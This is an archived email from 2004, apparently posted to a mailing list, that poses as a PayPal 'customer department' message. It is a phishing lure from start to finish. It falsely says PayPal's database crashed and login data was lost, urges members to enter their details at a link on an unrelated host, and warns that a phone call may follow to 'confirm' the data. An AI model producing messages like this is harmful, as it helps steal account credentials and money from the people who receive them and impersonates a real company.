Dear paypal member, We are sorry to inform you ...

paypal customer department paypalcustomerdepartment at abv.bg
Tue Mar 30 00:37:13 CEST 2004

Dear paypal member,
We are sorry to inform you that our database has been crashed, as a result some of our members login information has been lost.On behalf of paypal costumer care department we ask you please to go to the following link and submit your information:
http://bubu.to/storage/CustomerDepartment/Paypal%20customer%20care%20department.html
Please note that, Incase we needed further information or to confirm your submitted data one of our customer support department will call you.

Sincerely,
paypal customer department